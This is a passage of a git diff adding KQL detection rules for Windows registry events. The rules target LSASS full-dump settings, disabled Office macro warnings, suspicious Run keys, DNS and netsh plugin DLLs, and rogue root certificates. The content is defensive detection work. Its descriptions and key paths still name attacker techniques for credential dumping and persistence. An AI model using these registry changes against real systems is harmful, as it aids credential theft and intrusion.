+// Level: high
+// Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
+// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql b/KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql
new file mode 100644
index 00000000..ed914fe8
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql
@@ -0,0 +1,12 @@
+// Title: Lsass Full Dump Request Via DumpType Registry Settings
+// Author: @pbssubhash
+// Date: 2022-12-08
+// Level: high
+// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Legitimate application that needs to do a full dump of their process
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql b/KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql
new file mode 100644
index 00000000..0ca5d1c7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql
@@ -0,0 +1,12 @@
+// Title: Macro Enabled In A Potentially Suspicious Document
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql b/KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql
new file mode 100644
index 00000000..90821ff7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql
@@ -0,0 +1,12 @@
+// Title: MaxMpxCt Registry Value Changed
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-19
+// Level: low
+// Description: Detects changes to the "MaxMpxCt" registry value.
+// MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
+// Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql b/KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql
new file mode 100644
index 00000000..88fbf6f7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Office Protected View Disabled
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-06-08
+// Level: high
+// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Security\\ProtectedView*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql b/KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql
new file mode 100644
index 00000000..8711bbf5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql
@@ -0,0 +1,10 @@
+// Title: Modification of IE Registry Settings
+// Author: frack113
+// Date: 2022-01-22
+// Level: low
+// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or isnull(RegistryValueData) or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision")))) and (not(RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Accepted Documents"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql b/KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql
new file mode 100644
index 00000000..471f25b9
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql
@@ -0,0 +1,10 @@
+// Title: Modify User Shell Folders Startup Value
+// Author: frack113
+// Date: 2022-10-01
+// Level: high
+// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.001
+
+DeviceRegistryEvents
+| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql
new file mode 100644
index 00000000..3d35bef5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql
@@ -0,0 +1,12 @@
+// Title: NET NGenAssemblyUsageLog Registry Key Tamper
+// Author: frack113
+// Date: 2022-11-18
+// Level: high
+// Description: Detects changes to the NGenAssemblyUsageLog registry key.
+// .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
+// By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql b/KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql
new file mode 100644
index 00000000..f2dc52c1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql
@@ -0,0 +1,14 @@
+// Title: New Application in AppCompat
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: informational
+// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+//   - This rule is to explore new applications on an endpoint. False positives depends on the organization.
+//   - Newly setup system.
+//   - Legitimate installation of new application.
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql
new file mode 100644
index 00000000..a5a41fc3
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom DB Path Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate use of external DB to save the results
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql
new file mode 100644
index 00000000..13bb63f2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom VBScript Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate VBScript
+
+DeviceRegistryEvents
+| where RegistryValueData startswith "4" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
new file mode 100644
index 00000000..95e12749
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
@@ -0,0 +1,12 @@
+// Title: New BgInfo.EXE Custom WMI Query Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate WMI query
+
+DeviceRegistryEvents
+| where RegistryValueData startswith "6" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql b/KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql
new file mode 100644
index 00000000..f3678c83
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql
@@ -0,0 +1,10 @@
+// Title: New DNS ServerLevelPluginDll Installed
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-05-08
+// Level: high
+// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql b/KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql
new file mode 100644
index 00000000..db6a3359
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql
@@ -0,0 +1,10 @@
+// Title: New File Association Using Exefile
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-11-19
+// Level: high
+// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\."
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
new file mode 100644
index 00000000..e4204067
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
@@ -0,0 +1,10 @@
+// Title: New Netsh Helper DLL Registered From A Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-28
+// Level: high
+// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql b/KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql
new file mode 100644
index 00000000..d0f4d9c8
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql
@@ -0,0 +1,12 @@
+// Title: New ODBC Driver Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: low
+// Description: Detects the registration of a new ODBC driver.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Likely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey endswith "\\SQL Server*"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql b/KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql
new file mode 100644
index 00000000..44a79c6c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql
@@ -0,0 +1,10 @@
+// Title: New Root or CA or AuthRoot Certificate to Store
+// Author: frack113
+// Date: 2022-04-04
+// Level: medium
+// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "Binary Data" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates*") and RegistryKey endswith "\\Blob"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql b/KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql
new file mode 100644
index 00000000..5e36cf0c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql
@@ -0,0 +1,12 @@
+// Title: New RUN Key Pointing to Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2018-08-25
+// Level: high
+// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Software using weird folders for updates
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and ((RegistryValueData contains ":\\Perflogs" or RegistryValueData contains ":\\ProgramData'" or RegistryValueData contains ":\\Windows\\Temp" or RegistryValueData contains ":\\Temp" or RegistryValueData contains "\\AppData\\Local\\Temp" or RegistryValueData contains "\\AppData\\Roaming" or RegistryValueData contains ":\\$Recycle.bin" or RegistryValueData contains ":\\Users\\Default" or RegistryValueData contains ":\\Users\\public" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "%Public%" or RegistryValueData contains "%AppData%") or (RegistryValueData contains ":\\Users\\" and (RegistryValueData contains "\\Favorites" or RegistryValueData contains "\\Favourites" or RegistryValueData contains "\\Contacts" or RegistryValueData contains "\\Music" or RegistryValueData contains "\\Pictures" or RegistryValueData contains "\\Documents" or RegistryValueData contains "\\Photos"))) and (not(((RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Windows\\Temp\\") and (RegistryValueData contains "rundll32.exe " and RegistryValueData contains "C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce*"))) and (not((RegistryValueData endswith "Spotify.exe --autostart --minimized" and (InitiatingProcessFolderPath endswith "C:\\Program Files\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe") and RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql
new file mode 100644
index 00000000..660cb5a5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql
@@ -0,0 +1,12 @@
+// Title: New TimeProviders Registered With Uncommon DLL Name
+// Author: frack113
+// Date: 2022-06-19
+// Level: high
+// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+// Adversaries may abuse time providers to execute DLLs when the system boots.
+// The Windows Time service (W32Time) enables time synchronization across and within domains.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql
new file mode 100644
index 00000000..fb1a6b4f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Office Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office")) and (not((RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey endswith "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1*" or RegistryKey endswith "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim.InquireConnector.1*" or RegistryKey endswith "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1*" or RegistryKey endswith "\\Outlook\\AddIns\\AccessAddin.DC*" or RegistryKey endswith "\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteOLRD.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1*" or RegistryKey endswith "\\Outlook\\Addins\\OcOffice.OcForms*" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey endswith "\\Outlook\\Addins\\OscAddin.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\OutlookChangeNotifier.Connect*" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey endswith "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin*" or RegistryKey contains "AddinTakeNotesService\\FriendlyName")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql b/KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql
new file mode 100644
index 00000000..a1d37a25
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql
@@ -0,0 +1,12 @@
+// Title: Office Macros Warning Disabled
+// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-22
+// Level: high
+// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql b/KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql
new file mode 100644
index 00000000..79517046
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql
@@ -0,0 +1,12 @@
+// Title: Old TLS1.0/TLS1.1 Protocol Version Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: medium
+// Description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate enabling of the old tls versions due to incompatibility
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0*" or RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1*") and RegistryKey endswith "\\Enabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
new file mode 100644
index 00000000..f3d70682
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
@@ -0,0 +1,10 @@
+// Title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql b/KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql
new file mode 100644
index 00000000..67fee9f5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql
@@ -0,0 +1,12 @@
+// Title: Outlook Macro Execution Without Warning Setting Enabled
+// Author: @ScoubiMtl
+// Date: 2021-04-05
+// Level: high
+// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql b/KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql
new file mode 100644
index 00000000..842110b0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql
@@ -0,0 +1,12 @@
+// Title: Outlook Security Settings Updated - Registry
+// Author: frack113
+// Date: 2021-12-28
+// Level: medium
